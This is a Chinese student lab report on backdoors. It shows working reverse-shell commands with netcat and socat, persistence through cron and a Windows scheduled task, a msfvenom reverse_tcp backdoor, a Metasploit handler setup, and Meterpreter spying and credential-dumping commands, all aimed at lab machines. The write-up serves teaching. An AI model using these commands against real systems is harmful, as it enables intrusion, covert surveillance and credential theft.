20165310 NetSec Exp2后门原理与实践

一、基础问题

  • 例举你能想到的一个后门进入到你系统中的可能方式?

    • 网页木马等访问网页导致
    • 下载非官方源软件
    • 随意下载邮件中不明程序等
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    • 修改注册表,使后门进行自启动
    • 制定定时启动
  • Meterpreter有哪些给你映像深刻的功能?
    • msfconsole真是太好看了
    • 生成后门程序并且传输给目标电脑,连接控制
  • 如何发现自己有系统有没有被安装后门?
    • 查看进程,是否有异常进程
    • 查看注册表是否被修改过
    • 查看日志,是否有异常日志
    • 杀毒软件、防火墙

二、常用后门工具

1、natcat

  • 前期准备,获得主机ip

    • win:ipconfig

    linux:ifconfig

  • Win获得Linux Shell:利用反弹连接,此时win为攻击者,linux为受害者

    • windows 打开监听ncat.exe -l -p 5310

    • Linux反弹连接winnc 192.168.154.149 5310 -e /bin/sh

    • windows下获得一个linux shell,可运行任何指令,如ls

  • linux 获取 win的shell:利用反弹连接,此时linux为攻击者,win为受害者

    • kali下监听端口ncat.exe -l 5310

    • win10反弹连接kali ncat.exe -e cmd.exe 192.168.154.146 5310

    • linux下获得一个windows shell,可运行任何指令,如ls

  • nc传数据

    • Win下监听5310端口ncat.exe -l 5310,linux连接winnc 192.168.154.149 5310,随后在Linux输入需要传输的字符

    • 可以发现windows接收到了相同的数据

  • nc传输文件

    • 之后传输后门软件可以体现,没有进行单独的实验

三、实验内容

任务一:使用netcat获取主机操作Shell,cron启动

  • Windows启用监听ncat.exe -l 5310

  • 在Kali环境下用crontab -e指令编辑一条定时任务,初次使用需要选择编辑器,这里我们选择3,具体区别可以参考博客个人使用vim的一点心得

  • 在最后一行添加18 * * * * /bin/netcat 192.168.154.149 5310 -e /bin/sh,意思是在每个小时的第18分钟反向连接Windows主机的5310端口,具体crontab的用法可以参考博客crontab 详细用法 定时任务

  • 定时任务设定成功

  • 时间到后,windows获得shell

任务二:使用socat获取主机操作Shell, 任务计划启动

  • 在Windows7系统下,打开计算机管理->任务计划程序->创建任务,填写任务名称后NetSec_Exp2_5310

  • 新建触发器,工作站锁定时开始任务(模拟用户不在电脑前),选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5310 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5310,同时把cmd.exestderr重定向到stdout

  • 创建完成之后,按Win+L快捷键锁定计算机,解除锁屏后,可以发现之前创建的任务已经开始运行

  • kali下输入指令socat - tcp:192.168.154.149:5310成功获得shell

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 利用MSF生成恶意后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.154.146 LPORT=5310 -f exe > 5310_backdoor.exe,这里的IP地址为攻击者IP,即kali本机IP

    参数说明:

    -p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
    
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
    
-e 使用的编码器,用于对shellcode变形,为了免杀。
    
-i 编码器的迭代次数。如上即使用该编码器编码5次。
    
-b badchar是payload中需要去除的字符。
    
LHOST 是反弹回连的IP
    
LPORT 是回连的端口
    
-f 生成文件的类型
    
> 输出到哪个文件

  • kali下执行,在Windows下执行ncat.exe -lv 5310 > 5310_backdoor.exe指令,通过-lv选项看到当前的连接状态,在Linux中执行nc 192.168.154.149 5310 < 5310_backdoor.exe,这里的IP为被控主机IP,即Win7 IP,可以看见文件传输成功(文件大小为73k与生成大小匹配,截图中未能截到,可以通过这个判断是否传输完毕)

  • 在Kali上使用msfconsole指令进入msf控制台

  • 开始输入指令进行设置

    • 输入use exploit/multi/handler使用监听模块,设置payload

    • set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

    • set LHOST 192.168.154.146,这里是Kalid IP,即本机IP,和生成后门程序时指定的IP相同

    • set LPORT 5310,同样要使用相同的端口

    • 可以用命令show options确认设置是否正确

  • 输入攻击指令exploit进行攻击,获得shell

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • record_mic截获音频,可以用-d选项设置录制时间,默认2s

  • keyscan_start指令开始记录击键,keyscan_dump指令读取击键的记录,在Windows中输入命名为key的TXT文件,内容为 Hello World

  • screenshot进行屏幕截屏

  • 还有多条指令,可参照下方参数列表,或者自己用help指令更全面:

    meterpreter > help
    
Core Commands第一部分是核心指令
    
=============

    Command                   Description
    
    -------                   -----------
    
    ?                         Help menu
    
    background                Backgrounds the current session
    
    bgkill                    Kills a background meterpreter script
    
    bglist                    Lists running background scripts
    
    bgrun                     Executes a meterpreter script as a background thread
    
    channel                   Displays information or control active channels
    
    close                     Closes a channel
    
    disable_unicode_encoding  Disables encoding of unicode strings
    
    enable_unicode_encoding   Enables encoding of unicode strings
    
    exit                      Terminate the meterpreter session
    
    get_timeouts              Get the current session timeout values
    
    help                      Help menu
    
    info                      Displays information about a Post module
    
    irb                       Drop into irb scripting mode
    
    load                      Load one or more meterpreter extensions
    
    machine_id                Get the MSF ID of the machine attached to the session
    
    migrate                   Migrate the server to another process
    
    quit                      Terminate the meterpreter session
    
    read                      Reads data from a channel
    
    resource                  Run the commands stored in a file
    
    run                       Executes a meterpreter script or Post module
    
    set_timeouts              Set the current session timeout values
    
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    
    transport                 Change the current transport mechanism
    
    use                       Deprecated alias for 'load'
    
    uuid                      Get the UUID for the current session
    
    write                     Writes data to a channel

Stdapi: File system Commands第二部分是文件系统相关的
    
============================

    Command       Description
    
    -------       -----------
    
    cat           Read the contents of a file to the screen
    
    cd            Change directory
    
    dir           List files (alias for ls)
    
    download      Download a file or directory
    
    edit          Edit a file
    
    getlwd        Print local working directory
    
    getwd         Print working directory
    
    lcd           Change local working directory
    
    lpwd          Print local working directory
    
    ls            List files
    
    mkdir         Make directory
    
    mv            Move source to destination
    
    pwd           Print working directory
    
    rm            Delete the specified file
    
    rmdir         Remove directory
    
    search        Search for files
    
    show_mount    List all mount points/logical drives
    
    upload        Upload a file or directory

Stdapi: Networking Commands当然少不了网络操作的了
    
===========================

    Command       Description
    
    -------       -----------
    
    arp           Display the host ARP cache
    
    getproxy      Display the current proxy configuration
    
    ifconfig      Display interfaces
    
    ipconfig      Display interfaces
    
    netstat       Display the network connections
    
    portfwd       Forward a local port to a remote service
    
    resolve       Resolve a set of host names on the target
    
    route         View and modify the routing table

Stdapi: System Commands系统指令
    
=======================

    Command       Description
    
    -------       -----------
    
    clearev       Clear the event log
    
    drop_token    Relinquishes any active impersonation token.
    
    execute       Execute a command
    
    getenv        Get one or more environment variable values
    
    getpid        Get the current process identifier
    
    getprivs      Attempt to enable all privileges available to the current process
    
    getsid        Get the SID of the user that the server is running as
    
    getuid        Get the user that the server is running as
    
    kill          Terminate a process
    
    ps            List running processes
    
    reboot        Reboots the remote computer
    
    reg           Modify and interact with the remote registry
    
    rev2self      Calls RevertToSelf() on the remote machine
    
    shell         Drop into a system command shell
    
    shutdown      Shuts down the remote computer
    
    steal_token   Attempts to steal an impersonation token from the target process
    
    suspend       Suspends or resumes a list of processes
    
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands用户接口,可以抓取击键记录
    
===============================

    Command        Description
    
    -------        -----------
    
    enumdesktops   List all accessible desktops and window stations
    
    getdesktop     Get the current meterpreter desktop
    
    idletime       Returns the number of seconds the remote user has been idle
    
    keyscan_dump   Dump the keystroke buffer
    
    keyscan_start  Start capturing keystrokes
    
    keyscan_stop   Stop capturing keystrokes
    
    screenshot     Grab a screenshot of the interactive desktop
    
    setdesktop     Change the meterpreters current desktop
    
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
    
=======================

    Command        Description
    
    -------        -----------
    
    record_mic     Record audio from the default microphone for X seconds
    
    webcam_chat    Start a video chat
    
    webcam_list    List webcams
    
    webcam_snap    Take a snapshot from the specified webcam
    
    webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands提权
    
======================

    Command       Description
    
    -------       -----------
    
    getsystem     Attempt to elevate your privilege to that of local system.
    
    ***我的win7没成功***

Priv: Password database Commands导出密码文件SAM
    
================================

    Command       Description
    
    -------       -----------
    
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands修改文件操作时间,清理现场用
    
========================

    Command       Description
    
    -------       -----------
    
    timestomp     Manipulate file MACE attributes

  • 有些指令需要打开虚拟机摄像头连接,有些需要进行额外攻击操作,例如win7提权失败提示显示需要进行UAC绕过

遇到问题与解决方法

  • socat命令输错

    • 原因与解决方法:- tcp中间存在空格要注意

  • msf打开摄像头失败

    • 原因与解决方法:我的win7虚拟机设置连接后依然无法识别内置摄像头,需要真机环境或外设

  • msf无法连接

    • 原因与解决方法:输错host,由于复制原因,生成的.exe文件与设置的host错的很统一,迟迟找不出错误,改正即可

心得体会

  • 实验过程中犯了许多小错误,导致实验时间大大延长,需要更加细心严谨
  • MSF要学习的内容还很多,要多加研究学习

20165310 NetSec Week4 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week4 20165233

    Exp2 后门原理与实践 实验内容 一.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过访问钓鱼网站,无意下载了一些图片或是文件.而这个图片或文件中携带后门. 2.例举你知 ...

  2. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  3. 2018-2019 2 20165203 《网络对抗技术》 Exp2 后门原理与实践

    2018-2019 2 20165203 <网络对抗技术> Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获 ...

  4. 20155210 Exp2 后门原理与实践

    20155210 Exp2 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP 如图: 然后使用ncat.exe程序,n ...

  5. 20155226 Exp2 后门原理与实践

    20155226 Exp2 后门原理与实践 第一次实验博客交了蓝墨云未在博客园提交,链接 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机 ...

  6. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

  7. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  8. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  9. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

随机推荐

  1. Go linux 实践4

    这是目前学习的最难的Go demo例子 ***************************************** 如果能看懂,你就出师了,我的任务也就结束了 **************** ...

  2. Appium基础(四)查找app的appActivity与appPackage

    要查看appActivity需要借助日志:adb logcat>D:/log.log  前提是已经装了Android SDK 在目录D:\Program Files (x86)\android\ ...

  3. java的运行机制及初步相关配置(jdk)

    java的运行机制: 计算机高级语言的类型主要有编译型和解释型两种,而java语言是两种类型的结合. java首先利用文本编译器编写java源程序,源文件的后缀名为.java:再利用编译器(javac ...

  4. Koa中使用cookies

    错误重现:(使用ctx.cookies.set时报错) 这是因为koa的http的header字符集支持US-ASCII子集的字符集,故设置中文是'utf8'时就会报上面错误 解决方法有两种: 1.  ...

  5. SpringBoot返回json格式到浏览器上,出现乱码问题

    在对应的Controller上的requestMapping中添加: @RestController@EnableAutoConfiguration@RequestMapping(value = &q ...

  6. java中的锁之Lock接口与Condition接口

    一.Lock源码. 1.是一个接口.一共有6个方法. 2.方法详细如下: (1)当前线程尝试获取锁.结果分两种情况,一是成功获取到锁,则返回:二是获取锁失败,则一直等待.不响应中断请求. (2)当前线 ...

  7. Message对象

    一)描述 1: 每一个Message对象都包含两个对象: (1)google::protobuf::Descriptor 描述对象,是Message所有Filed的一个集合,它又包含了FieldDes ...

  8. Unity使用协程技术制作倒计时器

    先上效果图 图片资源来自http://www.51miz.com/ 1.素材准备 在http://www.51miz.com/搜索png格式的数字图片,用Unity自带的图集制作工具,进行分割.Con ...

  9. 创建一个简单的WCF程序

    1.创建WCF服务库 打开VS2010,选择文件→新建→项目菜单项,在打开的新建项目对话框中,依次选择Visual C#→WCF→WCF服务库,然后输入项目名称(Name),存放位置(Location ...

  10. bzoj4445 小凸想跑步

    题目链接 半平面交,注意直线方向!!! 对于凸包上任意一条边$LINE(p_i,p_{i+1})$都有$S_{\Delta{p_i} {p_{i + 1}}p} < S_{\Delta{p_0} ...